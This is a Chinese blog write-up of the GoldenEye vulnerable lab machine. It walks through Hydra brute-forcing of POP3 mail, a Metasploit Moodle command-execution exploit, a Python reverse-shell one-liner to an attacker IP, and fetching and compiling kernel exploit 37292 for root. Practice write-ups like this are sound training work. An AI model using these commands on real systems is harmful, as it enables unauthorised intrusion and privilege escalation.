项目一_GoldenEye

最新推荐文章于 2024-07-24 09:48:42 发布
最新推荐文章于 2024-07-24 09:48:42 发布
阅读量1.1k 收藏 1
点赞数
文章标签: linux 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zhou_juns/article/details/126631111
版权

0X01 信息收集

首先进行主机探测,发现主机192.168.0.15,且开放25、80端口。

image-20220814234556325

然后我们来访问一下80端口,发现线索:让我们进入到/sev-home/目录里进行登录。

image-20220814235002102

然后我们访问后要求我们输入账号和密码,接下来就到了寻找密码的时刻了。

image-20220814235036577

我们回到主页,查看页面源代码,发现一处js文件,terminal.js。

image-20220814235201219

访问看一下,留意到其中的注释语句。

image-20220814235257428

丢到百度翻译里进行翻译看看,看到其中出现了经过编码后的密码密文,以及提到了说Natalya可以破解该密文。

image-20220814235338026

获得用户名:Boris、Natalya
获得密码密文:InvincibleHack3r

然后把密码密文丢到burpsuite里进行decode as html,成功获取明文密码。

image-20220815000425074

此时已经获得的账号和密码:
账号:Boris、Natalya
密码:InvincibleHack3r

然后我们输入账号(boris)密码(InvincibleHack3r)成功登录跳转网站。

image-20220815000618740

留意到右边的字,翻译一下,得到提示“我们已将 pop3 服务配置为在非常高的非默认端口上运行”,意味着我们要进行全端口的扫描。

image-20220815000714844

扫描后发现多了两个端口,555006和55007,并查看版本信息。

image-20220815001217210

接下来尝试利用爆破登录邮件服务。

echo -e 'natalya\nboris' > user.txt    --将两个用户名写入txt文件
hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt 192.168.0.15 -s 55007 pop3

成功得到邮箱的账号密码。

账号/密码:
boris/secret1!
natalya/bird

image-20220815002715285

然后通过NC登录pop3查看邮件信封内容枚举:

nc 192.168.0.15 55007      ---登录邮箱
user boris                 ---登录用户
pass secret1!              ---登录密码
list                       ---查看邮件数量
retr 1~3                   ---查看邮件内容

首先登录的是boris的邮箱账户,里面包含了三封邮件。

image-20220815121020691

我们留意到第二封邮件是由natalya发来的,且内容为“Boris,我能破解你的密码”。第三封邮件可以看出有一份文件用了GoldenEye的访问代码作为附件进行发送,并保留在根目录中。但我们无法从此处阅读附件。

image-20220815121119156

登录natalya的邮箱查看邮件内容

nc 192.168.0.15 55007     ---登录邮箱
user natalya               ---登录用户
pass bird                  ---登录密码
list                       ---查看邮件数量
retr 1~2                   ---查看邮件内容

两封邮件:第一封邮件:

娜塔莉亚,请你停止破解鲍里斯的密码。 此外,您是 GNO 培训主管。一旦学生被指定给你,我就会给你发电子邮件。此外,请注意可能的网络漏洞。我们获悉,一个名为 Janus 的犯罪集团正在追捕 GoldenEye。

image-20220815122106311

第二封邮件:

好的 Natalyn 我有一个新学生给你。 由于这是一个新系统,如果您看到任何配置问题,请告诉我或鲍里斯,尤其是它与安全有关的问题……即使不是,也只需以“安全”为幌子下输入它……它将使变更单升级,而不会带来太多麻烦:)
好的,用户信用是:
用户名:xenia
密码:RCP90rulez!
鲍里斯验证了她是一个有效的承包商,所以只需创建帐户,好吗?
如果您没有外部内部域的 URL:severnaya-station.com/gnocertdir
**请务必编辑您的主机文件,因为您通常在远程离线工作....
由于您是 Linux 用户,因此只需将此服务器 IP 指向 /etc/hosts 中的 severnaya-station.com。

image-20220815123348881

在第二封邮件看到了另外一个用户名密码,此服务器域名和网站,还要求我们在本地服务hosts中添加域名信息

用户名:xenia
密码:RCP90rulez!
域:severnaya-station.com
网址:severnaya-station.com/gnocertdir

在host文件中添加域名,并访问severnaya-station.com/gnocertdir。

image-20220815125842757

image-20220815130028674

一访问就可以直接看到是使用了moodle这个cms来建站。随意点击,发现跳转到登录页面。

image-20220815130203153

利用刚刚在邮件中获取到的账号密码进行登录就可以成功登录。

image-20220815130422855

在点击后台的过程中发现该CMS的版本为2.2.3。

image-20220815131208122

在Messages模块当中发现一封邮件,出现新的名字“Dr Doak”,将其写人到user.txt文件中。

image-20220815131902158

继续爆破用户名doak的邮箱登录密码。

hydra -l doak -P /usr/share/wordlists/fasttrack.txt 192.168.0.15 -s 55007 pop3

image-20220815135014952

获取用户名/密码:diak/goat

登录doak用户查看邮件内容

nc 192.168.0.15 55007      ---登录邮箱
user doak                  ---登录用户
pass goat                  ---登录密码
list                       ---查看邮件数量
retr 1                     ---查看邮件内容

image-20220816200652070

image-20220816200807823

此时得到了新的账户信息,用户名:dr_doak,密码:4England!

成功登录之后发现右边多了一个模块,且有一个文件名为s3cret.txt。

image-20220816201409496

查看文件里的内容,提示到“这里有一些有趣的东西:/dir007key/for-007.jpg”

image-20220816202151947

访问看到是一张图片,把他保存到本地先。

wget http://severnaya-station.com/dir007key/for-007.jpg

根据邮件提示让我们检查图片内容,下载图片后,我们可以使用:

binwalk(路由逆向分析工具)
exiftool(图虫)
strings(识别动态库版本指令)
等查看jpg文件底层内容!

image-20220816203223217

image-20220816203322955

image-20220816203450906

在执行exiftool、strings命令时可以看到base64编码的隐藏信息:

eFdpbnRlcjE5OTV4IQ==

使用解密工具进行base64解密得到明文:

xWinter1995x!

image-20220816203711417

线索中说,这是管理员用户的密码。管理员用户身份继续登陆应用程序。

用户名:admin
密码:xWinter1995x!

image-20220816204037812

0X02 GetShell

方法一:

因为该CMS的版本为2.2.3,通过在网上搜索发现可以利用CVE-2013-3630漏洞进行RCE攻击,这里我们直接利用MSF。

msfconsole
search moodle
use 0
set username admin
set password xWinter1995x!
set rhost severnaya-station.com
set targeturi /gnocertdir
set payload cmd/unix/reverse
set lhost 192.168.0.109
run

use exploit/multi/http/moodle_cmd_exec
msf exploit(moodle_cmd_exec) > set rhost severnaya-station.com
msf exploit(moodle_cmd_exec) > set targeturi /gnocertdir
msf exploit(moodle_cmd_exec) > set username admin
msf exploit(moodle_cmd_exec) > set password xWinter1995x!

image-20220816234036957

image-20220816234337088

执行之后发现无法成功。

image-20220816234613963

查阅资料后知道MSF的底层代码使用的是pspellshell。这里的网页使用的是Googleshell,导致没有办法去运行。

进后台对其进行修改 Home /► Site administration / ►Plugins / ► Text editors / ►TinyMCE HTML editor

image-20220816233245491

再次运行,成功!

image-20220816234800199

image-20220816235100536

然后将shell进行tty

python -c 'import pty; pty.spawn("/bin/bash")'

image-20220816235838245

方法二:

用修改编辑器中拼写检查配置变量进行反弹shell

Settings/ ► Site administration / ► Server / ► System paths / ►Path to aspell

image-20220817000131674

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.109",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

同时监听本地6666端口:

image-20220817000520892

然后前往Home / ► My profile / ► Blogs / ► Add a new entry进行触发

image-20220817000754692

成功反弹!

image-20220817001637955

0X03 内核提权

首先查看一下系统信息:

uname -a

image-20220817002137860

内核版本Linux ubuntu 3.13.0-32,然后进搜索谷歌搜索:Linux ubuntu 3.13.0-32 exploit。获得exp版本:37292

image-20220817002343394

搜索kali本地的exp库中37292攻击脚本信息,并复制出来。

searchsploit 37292
cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/kali/桌面/

由于目标主机环境没有gcc环境,但有cc环境。

image-20220817003237260

需要对脚本进行修改:

image-20220817003412948

这时我们的kali主机开启HTTP服务让目标主机下载该脚本:

python -m http.server 8081

image-20220817003849284

目标主机访问kali的8081端口并下载脚本:

wget http://192.168.0.109:8081/37292.c

image-20220817004110103

编译脚本:

cc 37292.c -o 37292

image-20220817004236680

直接运行脚本,成功提权!

image-20220817004329150

最后成功获取flag:

python -m http.server 8081

[外链图片转存中…(img-Zw776EJ3-1661947579249)]

目标主机访问kali的8081端口并下载脚本:

wget http://192.168.0.109:8081/37292.c

[外链图片转存中…(img-6zyV4Qca-1661947579250)]

编译脚本:

cc 37292.c -o 37292

[外链图片转存中…(img-vEoTzefn-1661947579250)]

直接运行脚本,成功提权!

[外链图片转存中…(img-6w9zaqjT-1661947579250)]

最后成功获取flag:

image-20220817004536753

Zhou_juns
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python-GoldenEye一个HTTPDoS测试工具
08-10
在这个名为"GoldenEye-master"的压缩包文件中,我们可以预期找到的是GoldenEye项目的源代码和相关资源。 在Python开发领域,测试工具如GoldenEye对于保障网络服务的稳定性和安全性至关重要。HTTP DoS攻击是通过发送...
GoldenEye-master
05-09
GoldenEyedos是一款十分强的的dos工具,特别是对于一些中小型网站。
Windows下安装GoldenGate
crouhsou80631的博客
08-01 761
Windows下安装GoldenGate 一、检查数据库配置情况 检查归档模式、附加日志、强制日志参数是否开启。 10g要检查回收站功能是否关闭;1...
http(s)拒绝服务攻击工具--GoldenEye
weixin_43456810的博客
11-30 2171
http/https拒绝服务攻击工具–GoldenEye 获取方法: kali中直接wget: wget https://github.com/jseidl/GoldenEye/archive/master.zip 使用方法: ./goldeneye.py http://... -w 50 ./goldeneye.py http://... -w 50 -m random GoldenEye is a Python 3 app for SECURITY TESTING PURPOSES ONLY! Go
渗透项目(一):GodlenEye
Ays.Ie的博客
10-15 1229
今天开始写渗透学习笔记,第一个渗透项目:GoldenEye,大佬勿喷!!
Linux下简单的DNS
goldeneyezhang的专栏
11-23 387
#include <stdio.h><br />#include <stdlib.h><br />#include <errno.h><br />#include <string.h><br />#include <netdb.h><br />#include <sys/types.h><br />#include <netinet/in.h><br />#include <sys/socket.h><br />int main(int argc ,char *argv[])<br />{<br />str
阿里Goldeneye业务监控平台之架构演进,如何实时处理100T+/天的日志量?
weixin_37098404的博客
02-17 417
本文源自2月16日『高效开发运维』微信群的在线分享《Goldeneye 智能监控》,分享者为阿里巴巴开发专家马国强和许琦先生,转载请在文章开头注明来自『高效开发运维』公众...
2024年1、GoldenEye-靶机-百个项目计划_goldeneye 靶机,不可思议
2401_84904408的博客
05-11 593
具体来说,pty.spawn(“/bin/bash”) 命令会创建一个 Bash 进程,并将其连接到伪终端。由于这是一个新系统,如果您看到任何配置问题,请告诉我或鲍里斯,尤其是它与安全有关的问题……其中有说,这是管理员用户的密码!由于您是 Linux 用户,因此只需将此服务器 IP 指向 /etc/hosts 中的 severnaya-station.com。这里我们可以用exiftool(图虫)看一下图片里有没有什么隐藏信息,这里涉及一些ctf知识,大家不用担心,不会咱们就去查。
2024年最全1、GoldenEye-靶机-百个项目计划_goldeneye 靶机,2024年最新这些Golang高级必会知识点你能答出来几个
2401_84905039的博客
05-14 727
如果我们知道该系统存在的历史漏洞,我们也可以通过历史漏洞来拿shell。由于这是一个新系统,如果您看到任何配置问题,请告诉我或鲍里斯,尤其是它与安全有关的问题……用hydra(九头蛇)进行爆破,hydra可以对多种服务的账号和密码进行爆破,包括Web登录、数据库、SSH、FTP等服务,支持Linux、Windows、Mac平台安装!这里我们可以利用msf这款工具:Metasploit Framework(MSF)是一款开源安全漏洞监测工具,该工具已附带数千个已知的软件漏洞,且仍在保持更新。
1、GoldenEye-靶机-百个项目计划_goldeneye 靶机(1)
碧海朝天素
04-07 359
这里又看到一个人名doak我们将他写入我们的txt中继续拿去爆破这里也可以-l指定用户名爆破出来login: doak password: goat继续用nc去连接查看信息邮件消息说,为我们提供了更多登录凭据以登录到应用程序。让我们尝试使用这些凭据登录。用户名:dr_doak密码:4England!回到之前浏览器界面登陆一下有一个版本号有一个txt,打开txt看看有什么好东西:还是那句话英语太烂了,拿去翻译一下他说更多的东西在图片的目录里,那我们看看吧是上面这张图片下载下来。
goldeneye-50.zip
04-26
在STK官方模型库中,"goldeneye-50.zip"是一个特殊的模型资源,它并非内置在STK安装文件中,而是作为一个独立的补充,提供给用户更加丰富的模拟选择。 "goldeneye-50"模型,顾名思义,是一个与"GoldenEye"相关的...
GoldenEye:GoldenEye HTTP DoS 测试工具-开源
05-30
GoldenEye 是一个仅用于安全测试目的的 Python 应用程序! GoldenEye 是一个 HTTP DoS 测试工具。 被利用的攻击向量:HTTP Keep Alive + NoCache 请参阅自述文件了解更多详情。 请注意,这是 ...
Linux:基础命令学习
qq_55038440的博客
07-20 1115
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
GNU/Linux - Bazaar版本管理工具
最新发布
guoqx的专栏
07-24 295
根据 Jelmer Vernooij 的说法,Canonical 的 Bazaar 团队的成员在 2012 年初被分配到不同的任务,他本人在7年来为该项目做出贡献后,于2012年底停止了对 Bazaar 的贡献。同样,Bugzilla项目在2014 3月从 Bazaar 改为使用 git,其中一个原因是 Bazaar 几乎已被放弃的印象:“每个月可能有 2-3 次向主干提交。并用来进行Ubuntu项目的版本控制。Bazaar 可以由一个开发本地内容的多个分支的开发人员使用,也可以由跨网络协作的团队使用。
Linux服务器Java环境搭建】010在linux中安装Redis,以及对Redis的配置与远程连接
liuzhenhe1988的专栏
07-19 1066
好久没有更新博客了,今天下了班回到家,看到电脑桌上尘封已久的《Spring Boot应用开发实战》,翻开目录想起来之前写的系列【Linux服务器Java环境搭建】还未完结,那就继续吧,今天主要是按linux服务器中安装和配置redis。本系列其他文章,请查看系列【Linux服务器Java环境搭建】
linux学习笔记整理: 关于linux:Shell脚本 2024/7/20;
gzx233的博客
07-20 914
Shell脚本的使用
Linux 注意事项
m0_74012211的博客
07-19 612
Linux 与 Windows 是两个相互独立的操作系统,两者有较大差距
设计一个KNN算法模型来实现电影推荐功能,并使用该模型为一位新用户推荐电影。假设这位新用户已经对一些电影进行了评分,你需要基于这些评分来为他推荐一部电影。
06-02
10: 2.0, # GoldenEye } ``` 接下来,我们可以使用sklearn中的KNeighborsRegressor来建立KNN模型。这里我们使用余弦相似度作为距离度量,选取K=10。然后,我们可以使用模型对新用户进行电影推荐: ```python from...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值